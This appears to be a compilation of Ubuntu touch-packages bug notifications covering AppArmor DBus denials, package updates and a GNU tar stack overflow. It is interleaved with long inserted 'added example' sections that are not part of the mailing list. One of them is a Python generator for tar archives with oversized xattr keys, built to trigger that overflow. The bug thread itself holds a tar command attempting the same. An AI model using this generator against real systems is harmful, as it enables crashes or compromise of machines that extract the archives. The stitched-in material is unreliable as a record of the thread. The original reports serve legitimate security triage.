  Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
  DBus access

  = AppArmor =
  Time: 2024-03-10T13:4
  Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
  DBus access
  ```

  Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault.

  This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422; however, it seems as if Element is trying to hit the right paths and interfaces and is still being denied (based on looking at the info in https://github.com/snapcore/snapd/blob/master/interfaces/builtin/desktop_legacy.go and comparing the paths and interfaces there with the paths and interfaces shown by snappy-debug).

  I talked about this issue with Erich Eickmeyer and he mentioned that it occurred after a Plasma update. This doesn't make a great deal of sense to me, and I suspect possibly some other component of the affected systems happened to get updated at the same time (perhaps the snapd Snap), but it's
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
Yes, I hit that exact issue in Calamares, but after fixing it I then hit another similar crash in a different script in Calamares - will see if I can reproduce and provide you with details.
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
So I installed kubuntu-desktop on an up-to-date noble VM, and after logging into the Kubuntu session I was able to reproduce the issue for notifications, but I couldn't see anything owning the /StatusNotifierItem dbus path. For notifications I submitted https://github.com/snapcore/snapd/pull/13737 to snapd, which should resolve that, but if anyone can help me reproduce the issue for the status notifier item that would be great.

FWIW I have attached a screenshot of d-feet showing the various dbus paths owned by plasmashell, and /StatusNotifierItem is not listed. Am I perhaps missing some other package that doesn't get pulled in by the standard kubuntu-desktop metapackage?

** Attachment added: "Pasted image.png"
   https://bugs.launchpad.net/snapd/+bug/2056696/+attachment/5757409/+files/Pasted%20image.png
[Touch-packages] [Bug 2058329] [NEW] Update apparmor to 4.0.0-beta3 in noble
Public bug reported:

Latest upstream release https://gitlab.com/apparmor/apparmor/-/releases/v4.0.0-beta3

Contains only bug fixes since 4.0.0-beta2, which is currently in noble-proposed, thus does not require a FFe.

** Affects: apparmor (Ubuntu)
   Importance: Undecided
   Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2058329

Title:
  Update apparmor to 4.0.0-beta3 in noble

Status in apparmor package in Ubuntu:
  New

Bug description:
  Latest upstream release https://gitlab.com/apparmor/apparmor/-/releases/v4.0.0-beta3

  Contains only bug fixes since 4.0.0-beta2, which is currently in noble-proposed, thus does not require a FFe.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2058329/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
> Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined"

This is provided by the system-observe interface in snapd - currently it looks like element-desktop does not plug this, so the element-desktop snap needs to be updated to include this.

> Log: apparmor="DENIED" operation="dbus_method_call" bus="session"
> path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled"
> mask="send" name="org.kde.kwalletd5" pid=2950
> label="snap.element-desktop.element-desktop" peer_pid=1762
> peer_label="unconfined"

> Log: apparmor="DENIED" operation="dbus_method_call" bus="session"
> path="/modules/kwalletd5" interface="org.kde.KWallet" member="close"
> mask="send" name="org.kde.kwalletd5" pid=2950
> label="snap.element-desktop.element-desktop" peer_pid=1762
> peer_label="unconfined"

These are provided by the password-manager-service interface in snapd - again, currently it looks like element-desktop does not plug this, so the element-desktop snap needs to be updated to include this as well.

Finally, for the last two:

> Log: apparmor="DENIED" operation="dbus_method_call" bus="session"
> path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties"
> member="GetAll" name=":1.45" mask="receive" pid=2950
> label="snap.element-desktop.element-desktop" peer_pid=2394
> peer_label="plasmashell"

> Log: apparmor="DENIED" operation="dbus_signal" bus="session"
> path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem"
> member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950
> label="snap.element-desktop.element-desktop" peer_pid=2394
> peer_label="plasmashell"

Yes, this is due to the peer_label mismatch - previously plasmashell would run without an AppArmor profile and so was "unconfined" - the most recent apparmor release in Noble contains a new profile for plasmashell in /etc/apparmor.d/plasmashell with the label "plasmashell", and so now the peer_label doesn't match. This likely needs to be fixed on the snapd side (or we figure out a way in apparmor to not ship this profile).
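The reply above sorts the five denials into two root causes: calls that need an interface the snap does not plug (system-observe, password-manager-service) and calls that fail only because the peer's AppArmor label changed from "unconfined" to "plasmashell". The following triage script is an added example, not code from the thread or from snapd: it parses AppArmor DBus denial records into key/value fields and applies exactly that classification. The sample records are the ones quoted in the bug report (decoration lines dropped); the interface mapping is the one given in the reply; the rule that any confined peer outside the `snap.` namespace signals a label mismatch is an assumption of this example, not something snapd documents.

```python
import re
from collections import Counter

# Constructed sample: the five snappy-debug records quoted in this bug report,
# one per line, with the "= AppArmor =" / "Time:" / "DBus access" lines dropped.
SAMPLE_LOG = """\
apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined"
apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
"""

# Which snapd interface grants a DBus interface (optionally a specific member),
# as stated in the reply above. A None member means "any member of that interface".
SNAPD_INTERFACE_HINTS = {
    ("org.freedesktop.DBus", "ListActivatableNames"): "system-observe",
    ("org.kde.KWallet", None): "password-manager-service",
}

# key=value pairs; values are either double-quoted or bare (pid=2950, peer_pid=1762).
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Split one AppArmor audit line into a dict of field -> value (quotes stripped)."""
    return {key: raw.strip('"') for key, raw in FIELD_RE.findall(line)}


def classify(rec):
    """Return (category, detail) for a DENIED dbus_* record, or None for anything else."""
    if rec.get("apparmor") != "DENIED" or not rec.get("operation", "").startswith("dbus_"):
        return None
    peer = rec.get("peer_label", "unconfined")
    # Assumption of this example: a peer that now carries its own (non-snap) profile,
    # such as the new "plasmashell" profile, is the label mismatch the reply describes,
    # and no amount of plugging interfaces on the snap side will fix it.
    if peer != "unconfined" and not peer.startswith("snap."):
        return ("peer-label-mismatch", peer)
    iface, member = rec.get("interface"), rec.get("member")
    hint = SNAPD_INTERFACE_HINTS.get((iface, member)) or SNAPD_INTERFACE_HINTS.get((iface, None))
    if hint:
        return ("missing-plug", hint)
    return ("unclassified", f"{iface}.{member}")


def triage(log_text):
    """Return [(snap label, category, detail)] for every DENIED dbus record in log_text."""
    results = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        verdict = classify(rec)
        if verdict:
            results.append((rec.get("label"), *verdict))
    return results


def summarize(results):
    """Count findings per (category, detail) so each root cause is listed once."""
    return Counter((category, detail) for _, category, detail in results)


if __name__ == "__main__":
    findings = triage(SAMPLE_LOG)
    for label, category, detail in findings:
        print(f"{label}: {category} -> {detail}")
    for (category, detail), count in summarize(findings).items():
        print(f"{count} x {category} ({detail})")
```

Run against a real `journalctl -k` or snappy-debug capture, the summary separates "add a plug to the snap" work from "the profile shipped on the host changed" work, which is the distinction the thread needed to route the fix to the right package.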
[Touch-packages] [Bug 2056496] Re: [FFe] AppArmor 4.0-beta2 + prompting support for noble
Uploaded to noble-proposed yesterday
https://launchpad.net/ubuntu/+source/apparmor/4.0.0~beta2-0ubuntu3

** Changed in: apparmor (Ubuntu)
   Status: Triaged => Fix Committed

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2056496

Title:
  [FFe] AppArmor 4.0-beta2 + prompting support for noble

Status in apparmor package in Ubuntu:
  Fix Committed

Bug description:
  AppArmor 4.0-beta2 contains fixes that prevented AppArmor 4.0-beta1 from landing pre feature freeze. Landing the AppArmor 4.0 betas will enable us to more easily track upstream bug fixes, and is needed to support network rules in prompting.

  The addition of the prompting patch on top of AppArmor 4.0 is required to support snapd prompting in general for both file and network rules. Currently the prompting patch is not part of the upstream release but is part of the vendored apparmor in snapd. In order for snapd to be able to vendor the noble release of apparmor it requires support for prompting. The prompting patch is a straight rebase to AppArmor 4.0 of the patch that has been in testing in snapd prompting for more than six months.

  Changes from the 4.0.0~alpha4-0ubuntu1 (current noble) version

  Beta1 added three additional features that were not present in alpha4 (current Noble):
  • support for fine grained (address based) IPv4 and IPv6 mediation (required for prompting to support networking).
  • aa-notify support for message filters to reduce notifications
  • aa-logprof/genprof support for mount rules

  None of these features affect existing policy, which will continue to function under the abi that it was developed under. This can be seen in the regression testing below.

  In addition to the 3 features introduced in Beta1, Beta1 and Beta2 add several bug fixes; the most important are highlighted below, with the full list available in the upstream release notes at
  https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_4.0-beta1 and
  https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_4.0-beta2

  • new unconfined profiles in support of unprivileged user namespace mediation https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626
    ∘ nautilus, devhelp, element-desktop, epiphany, evolution, keybase, opam
  • fix policy generation for non-af_inet rules (MR:1175)
  • Fix race when reading proc files (AABUG:355, MR:1157)
  • handle unprivileged_userns transition in userns tests (MR:1146)
  • fix usr-merge failures on exec and regex tests (MR:1146)

  This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in
  https://git.launchpad.net/qa-regression-testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d

  The output of a test run is in the attached qrt.output file, of which the summary is below:

  Ran 62 tests in 811.542s
  OK (skipped=3)

  apparmor_4.0.0~beta2-0ubuntu3 has been installed on several up to date (as of March 7) noble systems. Boot/reboot and regression tests have been done against different kernel versions:

  6.8.0-11-generic #11-Ubuntu
  6.5.0-14-generic #14-Ubuntu
  6.7.0 (upstream custom build)
  6.8-rc3 (upstream custom build)

  The changelog is available here
  https://launchpad.net/~apparmor-dev/+archive/ubuntu/apparmor-devel/+files/apparmor_4.0.0~beta2-0ubuntu3_source.changes

  The prepared package is available via the ppa
  https://launchpad.net/~apparmor-dev/+archive/ubuntu/apparmor-ffe
[Touch-packages] [Bug 2054924] Re: color emoji are broken with fontconfig 2.15
As per https://gitlab.freedesktop.org/fontconfig/fontconfig/-/issues/409#note_2298588 this can also be fixed by adding an additional rule to /etc/fonts/conf.d/70-no-bitmaps.conf of the form:

false

** Bug watch added: gitlab.freedesktop.org/fontconfig/fontconfig/-/issues #409
   https://gitlab.freedesktop.org/fontconfig/fontconfig/-/issues/409

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to fontconfig in Ubuntu.
https://bugs.launchpad.net/bugs/2054924

Title:
  color emoji are broken with fontconfig 2.15

Status in Fontconfig:
  Fix Released
Status in fontconfig package in Ubuntu:
  Triaged
Status in fonts-noto-color-emoji package in Ubuntu:
  Triaged
Status in fontconfig package in Debian:
  Confirmed

Bug description:
  The Noto Color Emoji font is no longer used to show emoji. Many emoji no longer show and the few that do are not in color.
[Touch-packages] [Bug 2051540] Re: ufw ftbfs with Python 3.12 as default
Both dep8 tests already declare a Depends on python3-distutils - and we can see that the current test runs all used the 3.11-based python3-distutils - do we need a no-change rebuild of python3-stdlib-extensions so that it builds against Python 3.12?

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ufw in Ubuntu.
https://bugs.launchpad.net/bugs/2051540

Title:
  ufw ftbfs with Python 3.12 as default

Status in ufw:
  Fix Committed
Status in ufw package in Ubuntu:
  Confirmed
Status in ufw package in Debian:
  Fix Released

Bug description:
  ```
  ==
  ERROR: test_ufwcommand_parse (tests.unit.test_parser.ParserTestCase.test_ufwcommand_parse)
  Test UFWCommand.parse()
  --
  Traceback (most recent call last):
    File "/<>/tests/unit/test_parser.py", line 88, in test_ufwcommand_parse
      self.assertEquals('status', pr.action, "%s != 'status'" % (pr.action))
      ^
  AttributeError: 'ParserTestCase' object has no attribute 'assertEquals'. Did you mean: 'assertEqual'?

  ==
  ERROR: test_ufwcommand_rule_get_command (tests.unit.test_parser.ParserTestCase.test_ufwcommand_rule_get_command)
  Test UFWCommand(Route)Rule.get_command()
  --
  Traceback (most recent call last):
    File "/<>/tests/unit/test_parser.py", line 375, in test_ufwcommand_rule_get_command
      self.assertEquals(len(errors), 0,
      ^
  AttributeError: 'ParserTestCase' object has no attribute 'assertEquals'. Did you mean: 'assertEqual'?

  --
  Ran 24 tests in 7.584s

  FAILED (errors=9)

  test_skeleton
  test_example (tests.unit.test_skeleton.SkeletonTestCase.test_example)
  Test example dummy test ... ok

  --
  Ran 1 test in 0.000s

  OK
  ```
[Touch-packages] [Bug 2051540] Re: ufw ftbfs with Python 3.12 as default
** Also affects: ufw
   Importance: Undecided
   Status: New
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
Actually, I just got it working - no need to send the PoC @kerneldude - I made my own.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu.
https://bugs.launchpad.net/bugs/2029464

Title:
  A stack overflow in GNU Tar

Status in tar package in Ubuntu:
  New

Bug description:
  A stack overflow vulnerability exists in GNU Tar up to and including v1.34; as far as I can see, Ubuntu is using v1.3. The bug exists in the function xattr_decoder() in xheader.c, where alloca() is used, and it may overflow the stack if a sufficiently long xattr key is used. The vulnerability can be triggered when extracting a tar/pax archive that contains such a long xattr key.

  Vulnerable code: https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723

  PoC tar archive is attached in a zip archive to reduce the size.

  I reported the vulnerability yesterday to the GNU Tar maintainers and they replied that the issue was fixed in the version that was released two weeks ago:

  "Sergey fixed that bug here: https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4 and the fix appears in tar 1.35, released July 18."
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
So I managed to create a tar file with an extended attribute name ~36 bytes long (the largest I can do without exceeding the existing check on maximum extended header lengths, it seems), but this is not able to trigger the vuln - so if you are able to share your PoC that would be great.
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
@kerneldude - any chance you could share your PoC (perhaps email it to secur...@ubuntu.com rather than post it publicly here)? I have tried creating one via the following, but I hit the CLI args limit before I can get an xattr key long enough:

    touch bar
    tar --pax-option SCHILY.xattr.user.$(python3 -c "print('a'*131048)"):=test -cf poc-crafted.tar bar
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
Excellent - thanks for letting us know. So since a CVE has already been assigned then we won't assign an additional one. I'll add the details to our CVE tracker.
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
@kerneldude - do you know if MITRE ever assigned a CVE for this?

** Information type changed from Private Security to Public Security
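The CLI attempt earlier in this thread stalls on the shell's argument-length limit, because the whole xattr key has to be passed to `tar --pax-option` as one argument. Writing the pax extended header directly sidesteps that. The script below is an added example (not code from the bug report, from the reporter's PoC, or from GNU tar): it uses Python's `tarfile` module, which emits each entry of `TarInfo.pax_headers` as a `<len> <key>=<value>\n` record in the member's extended header, to build an archive carrying a `SCHILY.xattr.user.*` key of any length, and then parses it back to confirm the record is really there. The member name, value and default key length mirror the command above. It makes no claim about which key length overflows the stack on a given build (that depends on the process stack limit, and the thread mentions a maximum extended header length check that may reject the header first); list or extract the result only with an isolated copy of the tar build you are assessing.

```python
"""Build a pax archive with an arbitrarily long SCHILY.xattr.user.* key.

Added example: not code from the bug report or from GNU tar. Uses only the
standard-library tarfile module so it runs offline.
"""
import io
import sys
import tarfile

# Keyword prefix GNU tar uses for user.* extended attributes in pax headers.
XATTR_PREFIX = "SCHILY.xattr.user."


def build_long_xattr_archive(key_len, member_name="bar", value="test"):
    """Return the bytes of an uncompressed pax-format archive holding a single
    regular file `member_name` whose extended header contains the record
    `SCHILY.xattr.user.<'a' * key_len>=<value>`."""
    key = XATTR_PREFIX + "a" * key_len
    payload = b"hello\n"  # constructed file content; irrelevant to the header
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.PAX_FORMAT) as tf:
        info = tarfile.TarInfo(member_name)
        info.size = len(payload)
        info.mode = 0o644
        # tarfile writes every entry of pax_headers as "<len> <key>=<value>\n"
        # in the member's extended header (typeflag 'x') ahead of its ustar
        # header, with no cap on the key length.
        info.pax_headers = {key: value}
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def longest_xattr_key_len(archive):
    """Parse an archive back with tarfile and return the longest
    SCHILY.xattr.user.* key length (excluding the prefix) found on any member,
    or 0 if there is none. Confirms the record landed in the extended header."""
    longest = 0
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        for member in tf.getmembers():
            for keyword in member.pax_headers:
                if keyword.startswith(XATTR_PREFIX):
                    longest = max(longest, len(keyword) - len(XATTR_PREFIX))
    return longest


if __name__ == "__main__":
    # Defaults mirror the CLI attempt in the thread: 131048 'a's, poc-crafted.tar.
    key_len = int(sys.argv[1]) if len(sys.argv) > 1 else 131048
    out_path = sys.argv[2] if len(sys.argv) > 2 else "poc-crafted.tar"
    data = build_long_xattr_archive(key_len)
    with open(out_path, "wb") as f:
        f.write(data)
    print("wrote %s (%d bytes), xattr key length %d"
          % (out_path, len(data), longest_xattr_key_len(data)))
```

Run it as `python3 build_xattr_poc.py 8388608 poc-crafted.tar` to get a key larger than the default 8 MiB stack, then `tar -tf poc-crafted.tar` in a throwaway VM or container with the tar version under test; the key length is the only knob, so it is easy to bisect the size at which a given build fails.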
[Touch-packages] [Bug 2044625] Re: package libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 failed to install/upgrade: triggers looping, abandoned (original message: зацикливание триггеров, отмена работы)
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu.
https://bugs.launchpad.net/bugs/2044625

Title: package libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 failed to install/upgrade: triggers looping, abandoned

Status in gdk-pixbuf package in Ubuntu: New

Bug description:
ubuntu update to lunar lobster version

ProblemType: Package
DistroRelease: Ubuntu 23.04
Package: libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1
ProcVersionSignature: Ubuntu 5.15.0-89.99-generic 5.15.126
Uname: Linux 5.15.0-89-generic x86_64
ApportVersion: 2.26.1-0ubuntu2.1
Architecture: amd64
CasperMD5CheckResult: unknown
Date: Sun Nov 26 02:02:30 2023
ErrorMessage: triggers looping, abandoned
InstallationDate: Installed on 2023-11-25 (0 days ago)
InstallationMedia: Ubuntu 20.04.6 LTS "Focal Fossa" - Release amd64 (20230316)
Python3Details: /usr/bin/python3.11, Python 3.11.4, python3-minimal, 3.11.2-1
PythonDetails: N/A
RebootRequiredPkgs: Error: path contained symlinks.
RelatedPackageVersions:
 dpkg 1.21.21ubuntu1
 apt  2.6.0ubuntu0.1
SourcePackage: gdk-pixbuf
Title: package libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 failed to install/upgrade: triggers looping, abandoned
UpgradeStatus: Upgraded to lunar on 2023-11-25 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gdk-pixbuf/+bug/2044625/+subscriptions
[Touch-packages] [Bug 2043711] Re: Open3.pm tries to run code in /tmp when updating ubuntu-drivers-common
I am still struggling to see the vulnerability here - the path used in this case, /tmp/ubuntu-drivers-common.config.55GJ8b, appears to have a randomly generated suffix and so couldn't have been guessed beforehand nor preseeded with other contents by a local attacker - so the only way then that I can see that this could be a vulnerability would be if this file was world-writable - but it is not clear that this is the case either. Assuming this file comes from debconf, from what I can see in its sources, it creates temporary files via the https://perldoc.perl.org/File::Temp package - which states that files are created with permissions 0600 by default too.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to perl in Ubuntu.
https://bugs.launchpad.net/bugs/2043711

Title: Open3.pm tries to run code in /tmp when updating ubuntu-drivers-common

Status in perl package in Ubuntu: Invalid

Bug description:
During update of ubuntu-drivers-common:

Can't exec "/tmp/ubuntu-drivers-common.config.55GJ8b": Permission denied at /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm line 178, line 1.
open2: exec of /tmp/ubuntu-drivers-common.config.55GJ8b configure 1:0.9.6.2~0.22.04.4 failed: Permission denied at /usr/share/perl5/Debconf/ConfModule.pm line 59.
Preconfiguring packages ...
Can't exec "/tmp/ubuntu-drivers-common.config.uSPrCH": Permission denied at /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm line 178, line 1.
open2: exec of /tmp/ubuntu-drivers-common.config.uSPrCH configure 1:0.9.6.2~0.22.04.4 failed: Permission denied at /usr/share/perl5/Debconf/ConfModule.pm line 59.

/tmp is mounted with noexec because running code from /tmp has been a vulnerability vector for several decades, hence reporting this as a vulnerability in perl-base.

This error did not appear to prevent the update of ubuntu-drivers-common and "dpkg --verify ubuntu-drivers-common" returns 0.

___

Attempting to use the package search on this form by clicking the created a modal in which there is an error

    Sorry, something went wrong with your search. We've recorded what happened, and we'll fix it as soon as possible. (Error ID: OOPS-c80f71590b02908a1187b9f743c53eac)

which is repeated with any attempt to search for a package.

___

Submitting this form gives an error

    "perl-base" does not exist in Ubuntu. Please choose a different package. If you're unsure, please select "I don't know"

$ dpkg -S /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm
perl-base: /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm
$ dpkg -l perl-base
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version           Architecture Description
+++-==============-=================-============-====================
ii  perl-base      5.34.0-3ubuntu1.2 amd64        minimal Perl system

Looks like a package to me. Nevertheless, using "Did you mean..." offers "perl".

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: perl-base 5.34.0-3ubuntu1.2
ProcVersionSignature: Ubuntu 6.5.0-1007.7-oem 6.5.3
Uname: Linux 6.5.0-1007-oem x86_64
ApportVersion: 2.20.11-0ubuntu82.5
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
Date: Thu Nov 16 10:08:48 2023
InstallationDate: Installed on 2016-04-23 (2763 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
ProcEnviron:
 TERM=rxvt
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: perl
UpgradeStatus: Upgraded to jammy on 2022-08-19 (453 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/perl/+bug/2043711/+subscriptions
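The triage comment above turns on two facts about the temp file: its name cannot be predicted or pre-planted, and it is created mode 0600 so nobody else can write to it. The reporter's error, meanwhile, comes from /tmp being mounted noexec. The script below is an added example (not code from perl, debconf, File::Temp or the bug report) that does both checks with real syscalls: it creates a temp file the way File::Temp does by default (random suffix, O_EXCL, mode 0600 regardless of umask) via Python's `tempfile.mkstemp`, applies the owner/permission/symlink test you would want before exec'ing anything from a shared directory, and resolves which mount a path lives on from /proc/mounts-style text to report whether that mount is noexec. The /proc/mounts excerpt is constructed, not taken from the reporter's machine; the file name prefix imitates the one in the report.

```python
"""Temp-file safety and noexec checks behind the Open3.pm /tmp discussion.

Added example: not code from perl, debconf, File::Temp or the bug report.
"""
import os
import stat
import tempfile

# Constructed /proc/mounts excerpt (not from the reporter's system): /tmp is a
# separate tmpfs mounted noexec, as the reporter describes.
SAMPLE_MOUNTS = """\
/dev/sda2 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 /boot/efi vfat rw,relatime 0 0
"""


def make_private_tempfile(prefix="ubuntu-drivers-common.config.", dir=None):
    """Create a temp file with an unpredictable suffix and mode 0600. mkstemp
    opens it O_CREAT|O_EXCL and ignores the umask, which is what File::Temp
    does by default, so a pre-planted file or symlink at that name fails."""
    fd, path = tempfile.mkstemp(prefix=prefix, dir=dir)
    os.close(fd)
    return path


def is_safe_to_exec(path, expected_uid=None):
    """Return (ok, reason). A script in a shared directory is only safe to run
    if it is a regular file (not a symlink someone else planted), owned by the
    user doing the exec, and not writable by group or others."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False, "symlink"
    if not stat.S_ISREG(st.st_mode):
        return False, "not a regular file"
    uid = os.geteuid() if expected_uid is None else expected_uid
    if st.st_uid != uid:
        return False, "owned by uid %d, not %d" % (st.st_uid, uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False, "writable by group or others (mode %o)" % stat.S_IMODE(st.st_mode)
    return True, "ok"


def find_mount(path, mounts_text=SAMPLE_MOUNTS):
    """Return (mount_point, options) for the longest mount point containing
    path, given text in /proc/mounts format (device mountpoint fstype opts ...)."""
    best = None
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mnt, opts = fields[1], fields[3].split(",")
        if path == mnt or path.startswith(mnt.rstrip("/") + "/"):
            if best is None or len(mnt) > len(best[0]):
                best = (mnt, opts)
    return best


def mount_has_noexec(path, mounts_text=SAMPLE_MOUNTS):
    """True if the filesystem holding path is mounted noexec, i.e. exec() of a
    file there fails with EACCES ("Permission denied") even if mode bits allow."""
    found = find_mount(path, mounts_text)
    return found is not None and "noexec" in found[1]


def demo():
    """Run the checks end to end and return the observations as a dict."""
    path = make_private_tempfile()
    try:
        results = {
            "mode": stat.S_IMODE(os.stat(path).st_mode),
            "private_ok": is_safe_to_exec(path)[0],
        }
        os.chmod(path, 0o666)  # what a genuinely world-writable file looks like
        results["world_writable_ok"] = is_safe_to_exec(path)[0]
    finally:
        os.unlink(path)
    results["tmp_noexec"] = mount_has_noexec("/tmp/ubuntu-drivers-common.config.55GJ8b")
    results["perl_noexec"] = mount_has_noexec("/usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-18s %s" % (key, oct(value) if key == "mode" else value))
```

On a real system, replace `SAMPLE_MOUNTS` with `open("/proc/mounts").read()`; the noexec result is then the same thing the `Can't exec ... Permission denied` line is telling you, and the permission check is the one that would have to fail before the report's scenario became a privilege boundary crossing.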
[Touch-packages] [Bug 2040484] Re: ubuntu_seccomp pseudo-syscall fails on s390
Adding a task against libseccomp until we know more about where the bug lies.

** Also affects: libseccomp (Ubuntu)
   Importance: Undecided
       Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/2040484

Title: ubuntu_seccomp pseudo-syscall fails on s390

Status in ubuntu-kernel-tests: New
Status in libseccomp package in Ubuntu: New

Bug description:
libseccomp upstream has changed the test code for 29-sim-pseudo_syscall.c, which has broken it for s390. Perhaps s390 has been broken since forever and the test change is just uncovering it. We need to investigate if the fix would be needed in the test, libseccomp or the kernel.

This seems to affect at least 4.4 and 5.4 kernels, but may affect everything.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-kernel-tests/+bug/2040484/+subscriptions
[Touch-packages] [Bug 2039589] Re: Nvidia driver Ubuntu bug
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

